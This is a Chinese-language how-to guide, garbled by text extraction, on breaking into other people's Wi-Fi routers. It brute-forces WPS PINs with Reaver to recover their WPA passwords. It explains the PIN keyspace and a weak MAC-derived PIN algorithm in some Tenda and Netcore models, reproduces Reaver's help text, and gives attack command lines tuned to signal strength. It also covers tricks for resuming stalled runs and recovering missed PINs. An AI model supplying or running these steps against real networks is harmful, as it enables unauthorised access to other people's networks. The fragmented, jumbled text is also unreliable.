wpspinpj總結之再總結

1、WPSPIN PJ 總結之再總結都是自己學習 PIN 時的一些東西， 希望對大家有點幫助 無線破解現(xiàn)狀1、老路由沒有 pin 功能，并且設置 wpa15 位以上長密碼的。 缺點：這類路由破解需要抓包跑字典，基本無解；2、WEP 加密的新舊款無線路由基本百分百能解出密碼。缺點： WEP 越來越少3、近兩年新款無線支持 pin 碼的路由， 基本百分百能破解密 碼和 pin 碼。優(yōu)點： WPA 、WPA2 被授予無法破解的神話， 這個神話終于 被 pin 破解打破，基本上這兩年的新款路由都支持pin 功能無線路由 pin 碼一共 11000 組數(shù)字組成前四位是 00009999 ， 后三位是 000

2、999 ，最后以為是 09. 這樣就可以肯定不管對 方路由設置的是什么密碼， 都逃不過這 11000 組數(shù)字。 只要 他支持 pin 功能我們就可以百分百的破解出對方路由的 pin 碼和設置的 wpa 密碼（密碼以明文方式顯示） 缺點：這種破解只能針對近兩年的新路由，就是軟件搜到后 面顯示 wps 名稱的路由。 老路由不支持 pin 功能只有繼續(xù)使 用原始方式破解。并且 pin 的過程中容易出現(xiàn)把對方路由端 口堵死（堵死后必須等待對方重啟路由才能繼續(xù)完成破解） 破解時間較長幾分鐘 幾小時關于 WPSFrom: WPS 是一項 非專有的規(guī)范，它是由 Wi-Fi 聯(lián)盟實施的認證項目。 WPS 是

3、Wi-Fi 認證產(chǎn)品的可選認證項目。 并非所有的 Wi-Fi 認證 產(chǎn)品都支持 WPS ，用戶可在產(chǎn)品上尋找 Wi-Fi Protected Setup 的標志，以確保所購產(chǎn)品已具備 Wi-Fi Protected Setup 功能。已通過 Wi-Fi Protected Setup 的產(chǎn)品目前能夠 為用戶提供兩種安裝解決方案：輸入PIN碼一一對于WPS認證的設備為強制配置。按鈕配置（PBC ）它可以是設備上的硬件按鈕或軟件模擬的按鈕（對于無線客戶端為可選 配置）。在 PIN 配置模式中，系統(tǒng)在接入點或無線路由器中 設置注冊表， 用戶通過在注冊表中輸入客戶端 PIN 碼為網(wǎng)絡 中新增設備分配證

4、書 （注意： 在 PBC 模式中， 當客戶端 PIN 碼為全 0 時，系統(tǒng)也需要設置注冊表） 。 WPS 并沒有新增 安全性能它使得現(xiàn)有的安全技術更容易配置。 PIN 計算新 突破：部分無線路由可直接由 MAC 計算出默認 PIN 近日， 騰達部分以MAC為“ C83A35”，“ OOBOOC”打頭的，包含騰達 W150M 在內的產(chǎn)品以及 磊科 NW705P ， 磊科 NW705S ， 磊科 NW705+ ， 磊科 NW714 ， 磊科 NW702 ，磊科 NW712 ，磊科 NW709 等產(chǎn)品相繼泄露出 PIN 算法。如果您的路由 MAC 前 6 位是 C83A35 或者 00B00C ，輸

5、入后六位 MAC ，您可以直接獲取 到 PIN 密鑰其 PIN 算法十分簡陋，只需要將相應前 6位 MAC 開頭的產(chǎn)品的后 6 位 16 進制 MAC 轉化成 10 進制 數(shù)，即可得到一個 7 位數(shù)字。眾所周知的是， PIN 由 8 位構 成，其前 7 位為隨機，而第八位為校驗位，可通過前七位計 算得來。 從而直接由 MAC 獲取出 PIN ，并通過 Reaver 獲取 其 WPA PSK 密鑰，從而快速破解路由。根據(jù) IEEE 標準數(shù) 據(jù)庫信息， C83A35 和 00B00C 均屬于騰達科技旗下的 OUI 地址，此次受影響的路由包括但不限于騰達 W150M 等騰達 型號的，具備 QSS/W

6、PS 連接功能的路由。 WiFiBETA 預測，磊科官方全線產(chǎn)品均采用這種簡單的，不安全的，非 隨機的 PIN 生成方案。其官方網(wǎng)站聲明提到，受影響的產(chǎn)品 為本文文初所羅列， 其相關升級軟件 （初步估計為固件或 PIN 重燒錄工具）正在開發(fā)中。而騰達中有部分產(chǎn)品，其 OUI 為 C83A35,00B00C,081075 等的路由均亦采用此類算法。 值得一提的是，騰達官方并未做出任何證明回應。關于 Reaver reaver-wpsBrute force attack against Wifi Protected SetupHomepage: average Reaver will recove

7、r the target APs plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. douglaspentest:/pentest/wireless/reaver-1.4/src$ ./conf igure checking for gcc. gcc checking whether the C c

8、ompiler works. yes checking for C compiler default output file name. a.out checking for suffix of executables.checking whether we are cross compiling. no checking for suffix of object files. o checking whether we are using the GNU C compiler. yes checking whether gcc accepts -g. yes checking for gcc

9、 option to accept ISO C89. none needed checking for pcap_open_live in -lpcap. no error: pcap library not found!sudo apt-get install libpcap0.8-devxxxxxxpentest:/pentest/wireless/reaver- 1.4/src$ ./reaverReaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig

10、Heffner < gt;Required Arguments: 必選參數(shù)-i, -interface=<wlan>Name of themonitor-mode interface to use使用到的監(jiān)控模式的接口的名字-b, -bssid=<mac>BSSID ofthe target AP 目標 AP 的 BSSIDOptional Arguments: 可選參數(shù)-m, -mac=<mac>MAC ofthe host system 主機系統(tǒng)的 MAD 地址-e, -essid=<ssid>ESSID ofthe target AP

11、 目標 AP 的 ESSID-c, -channel=<channel>Set the802.11 channel for the interface (implies -f)設置 802.11頻道的接口 意味著 -f-o, -out-file=<file>Send outputto a log file stdout發(fā)送輸出到一個log 文件 （標準輸出 ）-s, -session=<file>Restore aprevious session file 恢復以前的會話文件-C, -exec=<command>Execute the suppl

12、ied command upon successful pinrecovery 在 pin 成功回復后執(zhí)行如下命令-D, -daemonizereaver 守護進程-a, -autobest advanced options for the target AP 最好的高級選項-f, -fixed hopping 禁用頻道跳頻-5, -5ghzDaemonizeAuto detect the自動檢測目標 APDisable channelUse 5GHz 頻道-v, -verbosenon-critical warnings (-vv for more)Display 顯示非嚴重警告 (vv 更

13、verbose 詳細802.11 channels 使用 5GHz 802.11-q, -quietOnly displaycritical messages 安靜 僅顯示關鍵消息-h, -helpShow help 顯Use the示幫助 Advanced Options: 高級選項-p, -pin=<wps pin>specified 4 or 8 digit WPS pin使用指定的 4 個或 8 個數(shù)字Set theWPS pin設置延遲之后的嘗試-d, -delay=<seconds>delay between pin attempts 1-l, -lock-

14、delay=<seconds>Set thetime to wait if the AP locks WPS pin attempts 60設置時間等待，如果 AP 鎖定 WPS pin 嘗試-g, -max-attempts=<num>Quitafter num pin attempts數(shù)字 pin 嘗試后退出-x, -fail-wait=<seconds>Set the timeto sleep after 10 unexpected failures 0設置睡眠時間在10 次意外失敗之后睡眠 Y 秒后嘗試 x pin-r, -recurring-del

15、ay=<x:y>Sleep for yseconds every x pin attempts-t, -timeout=<seconds>Set thereceive timeout period 5設置超時周期-T, -m57-timeout=<seconds>Set theM5/M7 timeout period 0.20 設置 M5/M7 超時周期-A, -no-associateDo notassociate with the AP (association must be done by another application) 不關聯(lián)到 AP 使

16、用另外的程序關聯(lián)-N, -no-nacksDo not sendNACK messages when out of order packets are received 當亂序數(shù)據(jù)包被接收時，不發(fā)送 NACK 消息Use small DH 使用小 DH 密鑰來提高破解-S, -dh-smallkeys to improve crack speed速度Ignore locked-L, -ignore-locks-n, -nack always sends a NACK Auto APTarget AP總是發(fā)送一個 NACK 到目標-w, -win7Windows 7 registrar Fals

17、eMimic a模仿 Windows 7 登記state reported by the target AP忽略報告為鎖定狀態(tài)的 AP-E, -eap-terminateTerminate eachWPS session with an EAP FAIL packetFAIL 包來終止滅個 WPS 會話使用一個 EAPExample: 例如./reaver -i mon0 -b 00:90:4C:C1:AC:21 -vvReaver的一些技巧 使用 PIN 方法破解 WPA-PSK 密碼有一個限制， 就是 AP 必 須開啟了 QSS 、WPS 功能！ 使用 airodump-ng 掃描時候在

18、MB 欄中 54e 后面有點 (.) 的是 開了 wps 。但是這個要多試幾次才準。 可以先用 Qss 軟件測 試一下或者在 win7 下面，連接 AP 時候在密碼輸入框下面有“通過 按路由器按鈕也可以連接”字樣也是開啟了 QSS 、wps 的。 關于信號PIN 破密對信號要求極為嚴格，如果信號稍差，可能導致破 密進度變慢或者路由死鎖等（重復同一個 PIN 碼 或 timeout ）。AP關閉了 WPS、或者沒有 QSS滴，會出現(xiàn)WARNING: Failed to associate with XX:XX:XX:XX:XX:XX （ESSID: XXXX）PWR 小于 -75 基本上會 Ti

19、meout, PWR-60 左右 ,則非常順暢 （2-6 秒攻擊一次 ） 目標信號非常好 : reaver -i mon0 -b MAC -a -S -vv -d0 -c 1目標信號普通 :reaver-imon0-b MAC-a-S-vv-d2 -t 5 -c 1目標信號一般 :reaver-imon0-b MAC-a-S-vv-d5 -c 1 關于死循環(huán)當出現(xiàn)的時候+ Sending EAPOL START request! WARNING: Receive timeout occurred+ Sending EAPOL START request! WARNING: Receive ti

20、meout occurred+ Sending EAPOL START request! WARNING: Receive timeout occurred+ Sending EAPOL START request! WARNING: Receive timeout occurred+ Sending EAPOL START request按 Ctrl +C 停止，然后使用reaver -i mon0 -b mac 地址 -a -S -vv -s /root/e234567890bc.wpc 繼續(xù)跑當 reaver 確定前 4 位 PIN 密碼后， 其工作完成任務進度數(shù)值將直接跳躍至 90.9

21、% 以上， 也就是說只剩余一千個密碼組合了?？偣惨蝗f一千個密碼。如果， 90.9%進程后死機或停機，請記下 PIN 前四位數(shù)，用 指令：reaver -i monO -b MAC -a -vv -p XXXX（PIN 前四位數(shù)） 會從指定 PIN 段起破密。如果進度到 99.9% 后， AP 死機，可打開它，總共 1OOO 個 3 位數(shù)，找出剩余的十幾個 PIN 碼，用 QSS 、WPS 客戶端軟 件,手動測試、破密。如果是跑了 99.99% 死機 , 意味嗎？ 你懂的吧？ 最后一 個 PIN 就是。指定 PIN 碼，獲得 WPA 密碼 PSKreaver -i monO -b MAC -p

22、8 位數(shù) PIN 值如果上述措施不后，仍不見 PSK 密碼，可能因軟件原因，漏碼了！重新跑后三 位數(shù)+ Trying pin O2835679+ Sending EAPOL START request+ Received identity request+ Sending identity response+ Received M1 message+ Sending M2 message+ Received M3 message+ Sending M4 message + Received WSC NACK正常情況下在 M4 后，會收到 WSC NACK 包。這是就知道 當前的 0283 是錯

23、誤的。然后開始試下一個 pin. 缺省情況下，如果在 M4 后沒有收到任何包，等待超時后， 也會認為當前的 pin 是錯誤的，然后開始試下一個 pin. 如果是因為丟包的原因，沒有收到 M5 包，顯然正確的 pin 就會當作錯誤的 pin. 因此就會出現(xiàn) 99.99% 的問題。 解決辦法 : 加上 -n 參數(shù) reaver -vvnS -d 0 -b xxxx注意：reaver會為每個AP創(chuàng)建一個pin序列文件,這個文件 存放在/etc/reaver/ 或 /usr/local/etc/reaver,根據(jù) reaver 的幫助， reaver 缺省情況下會自動檢查 AP 是否 回應 NACK.